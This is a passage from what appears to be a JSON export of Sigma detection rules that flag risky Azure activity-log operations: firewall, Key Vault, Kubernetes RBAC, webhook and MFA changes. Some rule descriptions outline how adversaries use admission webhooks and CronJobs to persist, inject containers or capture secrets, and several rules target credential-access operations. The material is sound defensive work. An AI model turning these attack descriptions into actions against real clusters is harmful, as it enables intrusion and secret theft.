    "content": "title: Azure Firewall Modified or Deleted\nid: 512cf937-ea9b-4332-939c-4c2c94baadcd\nstatus: test\ndescription: Identifies when a firewall is created, modified, or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE\n    condition: selection\nfalsepositives:\n    - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml",
    "content": "title: Azure Firewall Rule Collection Modified or Deleted\nid: 025c9fe7-db72-49f9-af0d-31341dd7dd57\nstatus: test\ndescription: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE\n    condition: selection\nfalsepositives:\n    - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml",
    "content": "title: Granting Of Permissions To An Account\nid: a622fcd2-4b5a-436a-b8a2-a4171161833c\nstatus: test\ndescription: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml\nauthor: sawwinnnaung\ndate: 2020-05-07\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.003\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    keywords:\n        - Microsoft.Authorization/roleAssignments/write\n    condition: keywords\nfalsepositives:\n    - Valid change\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml",
    "content": "title: Azure Keyvault Key Modified or Deleted\nid: 80eeab92-0979-4152-942d-96749e11df40\nstatus: test\ndescription: Identifies when a Keyvault Key is modified or deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION\n    condition: selection\nfalsepositives:\n    - Key being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml",
    "content": "title: Azure Key Vault Modified or Deleted\nid: 459a2970-bb84-4e6a-a32e-ff0fbd99448d\nstatus: test\ndescription: Identifies when a key vault is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KEYVAULT/VAULTS/WRITE\n            - MICROSOFT.KEYVAULT/VAULTS/DELETE\n            - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE\n    condition: selection\nfalsepositives:\n    - Key Vault being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml",
    "content": "title: Azure Keyvault Secrets Modified or Deleted\nid: b831353c-1971-477b-abb6-2828edc3bca1\nstatus: test\ndescription: Identifies when secrets are modified or deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION\n    condition: selection\nfalsepositives:\n    - Secrets being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml",
    "content": "title: Azure Kubernetes Admission Controller\nid: a61a3c56-4ce2-4351-a079-88ae4cbd2b58\nstatus: test\ndescription: |\n  Identifies when an admission controller is executed in Azure Kubernetes.\n  A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\n  The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\n  An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\n  For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\n  An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\n  An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\nauthor: Austin Songer @austinsonger\ndate: 2021-11-25\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.007\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith:\n            - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'\n            - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'\n        operationName|endswith:\n            - '/MUTATINGWEBHOOKCONFIGURATIONS/WRITE'\n            - '/VALIDATINGWEBHOOKCONFIGURATIONS/WRITE'\n    condition: selection\nfalsepositives:\n    - Azure Kubernetes Admissions Controller may be done by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml",
    "content": "title: Azure Kubernetes Cluster Created or Deleted\nid: 9541f321-7cba-4b43-80fc-fbd1fb922808\nstatus: test\ndescription: Detects when a Azure Kubernetes Cluster is created or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE\n    condition: selection\nfalsepositives:\n    - Kubernetes cluster being created or  deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml",
    "content": "title: Azure Kubernetes CronJob\nid: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a\nstatus: test\ndescription: |\n  Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\n  Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\n  An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\n    - https://kubernetes.io/docs/concepts/workloads/controllers/job/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\nauthor: Austin Songer @austinsonger\ndate: 2021-11-22\nmodified: 2022-12-18\ntags:\n    - attack.persistence\n    - attack.t1053.003\n    - attack.privilege-escalation\n    - attack.execution\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith:\n            - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH'\n            - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH'\n        operationName|endswith:\n            - '/CRONJOBS/WRITE'\n            - '/JOBS/WRITE'\n    condition: selection\nfalsepositives:\n    - Azure Kubernetes CronJob/Job may be done by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml",
    "content": "title: Azure Kubernetes Events Deleted\nid: 225d8b09-e714-479c-a0e4-55e6f29adf35\nstatus: test\ndescription: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - attack.t1562.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\n    condition: selection\nfalsepositives:\n    - Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml",
    "content": "title: Azure Kubernetes Network Policy Change\nid: 08d6ac24-c927-4469-b3b7-2e422d6e3c43\nstatus: test\ndescription: Identifies when a Azure Kubernetes network policy is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE\n    condition: selection\nfalsepositives:\n    - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml",
    "content": "title: Azure Kubernetes Pods Deleted\nid: b02f9591-12c3-4965-986a-88028629b2e1\nstatus: test\ndescription: Identifies the deletion of Azure Kubernetes Pods.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\n    condition: selection\nfalsepositives:\n    - Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml",
    "content": "title: Azure Kubernetes Sensitive Role Access\nid: 818fee0c-e0ec-4e45-824e-83e4817b0887\nstatus: test\ndescription: Identifies when ClusterRoles/Roles are being modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION\n    condition: selection\nfalsepositives:\n    - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml",
    "content": "title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted\nid: 25cb259b-bbdc-4b87-98b7-90d7c72f8743\nstatus: test\ndescription: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE\n    condition: selection\nfalsepositives:\n    - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml",
    "content": "title: Azure Kubernetes Secret or Config Object Access\nid: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c\nstatus: test\ndescription: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE\n    condition: selection\nfalsepositives:\n    - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml",
    "content": "title: Azure Kubernetes Service Account Modified or Deleted\nid: 12d027c3-b48c-4d9d-8bb6-a732200034b2\nstatus: test\ndescription: Identifies when a service account is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1531\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION\n    condition: selection\nfalsepositives:\n    - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_mfa_disabled.yml",
    "content": "title: Disabled MFA to Bypass Authentication Mechanisms\nid: 7ea78478-a4f9-42a6-9dcd-f861816122bf\nstatus: test\ndescription: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates\nauthor: '@ionsor'\ndate: 2022-02-08\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.t1556\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        eventSource: AzureActiveDirectory\n        eventName: 'Disable Strong Authentication.'\n        status: success\n    condition: selection\nfalsepositives:\n    - Authorized modification by administrators\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml",
    "content": "title: Azure Network Firewall Policy Modified or Deleted\nid: 83c17918-746e-4bd9-920b-8e098bf88c23\nstatus: test\ndescription: Identifies when a Firewall Policy is Modified or Deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-09-02\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1562.007\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\n    condition: selection\nfalsepositives:\n    - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml",
    "content": "title: Azure Firewall Rule Configuration Modified or Deleted\nid: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067\nstatus: test\ndescription: Identifies when a Firewall Rule Configuration is Modified or Deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE\n    condition: selection\nfalsepositives:\n    - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml",
    "content": "title: Azure Point-to-site VPN Modified or Deleted\nid: d9557b75-267b-4b43-922f-a775e2d1f792\nstatus: test\ndescription: Identifies when a Point-to-site VPN is Modified or Deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE\n    condition: selection\nfalsepositives:\n    - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml",
    "content": "title: Azure Network Security Configuration Modified or Deleted\nid: d22b4df4-5a67-4859-a578-8c9a0b5af9df\nstatus: test\ndescription: Identifies when a network security configuration is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE\n    condition: selection\nfalsepositives:\n    - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify 